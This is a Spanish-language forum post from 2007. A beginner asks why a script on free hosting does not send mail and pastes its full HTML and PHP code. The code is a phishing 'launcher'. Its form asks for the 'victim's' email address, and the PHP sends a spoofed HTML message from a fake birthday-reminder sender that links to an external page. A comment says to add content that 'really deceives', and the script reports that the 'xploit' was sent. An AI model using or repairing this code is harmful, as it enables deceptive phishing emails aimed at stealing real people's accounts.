Ver Mensaje Individual
  #4 (permalink)  
Antiguo 09/09/2007, 14:35
sabruchi
 
Fecha de Ingreso: junio-2006
Mensajes: 166
Antigüedad: 17 años, 10 meses
Puntos: 3
Re: hosting gratuito que admita sendmail

sigo con problemas... me registre en lycos y no logro que me lleguen los mails, las paginas se suben bien y no me tira error...
se pego el codigo para que lo chequeen y vean si hay error o les pido que me digan si hay otros factores a tener en cuenta para que lleguen los mails porque soy novata en esto...

el archivo htm

<html>
<head>
<title>Mi Lanzador</title>
<body link="#FFFFFF" vlink="#FFFFFF" alink="#FFFFFF" text="#FFFFFF" bgcolor="#003366">

<center><b><font face="Verdana" size="5">MI LANZADOR1</font></b><p>&nbsp;<br>
</p>
<FORM action="lanzador1.php" method=POST>
<b><font face="Verdana" size="2">Mail de la victima:</font></b> <br>
<input type="text" name="destinatario" align="top" maxLength="50" size="20" value="@hotmail.com">
<br>
<input type="submit" name="Submit" value="Enviar">
</FORM>
<p align="center"><font face="Verdana" size="2">
<a HREF="javascript:history.go(-1);" style="font-weight: 700">
ATRAS</a></font></p>

</html>


el archivo php

<?
header ("Cache-Control: no-cache, must-revalidate");
header ("Pragma: no-cache");


$msg= '<html>

<head>
<title>Mi Lanzador</title>
</head>

<body>
<div style="BACKGROUND-COLOR:white">
<title>Mi Lanzador</title>
<table border="0"><tr><td align="center"><b>
<font face="verdana, tahoma, arial, sans-serif" size="2">EJEMPLO: Visita mi
web, yo que se xD... puras cosas así.</font></b><font face="verdana, tahoma, arial, sans-serif" size="2" color="black"><b><br><BR>
<a target="_blank" href="http://WWW.AQUIMIWEB.COM/conforme.php">http://www.miweb.com</a><br>&nbsp;</b></font><p>
<b><font face="verdana, tahoma, arial, sans-serif" size="2">Aqui puedes poner
el codigo de una targeta, o algo que realmente engañe...</font></b><font face="verdana, tahoma, arial, sans-serif" size="2" color="black"><b><br><br><br><br>&nbsp;</td></tr></table>
</body>

</html>
';
$destinatario = $_POST['destinatario'];
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$headers .= 'From: Recordatorio de Cumplea&ntilde;os <[email protected]>' . "\r\n";
$asunto= '¡Ejemplo Mi Lanzador!';
mail($destinatario, $asunto, $msg, $headers);
$conf="El xploit fue enviado correctamente a $destinatario \n";
echo $conf;

?>

muchas gracias genios!!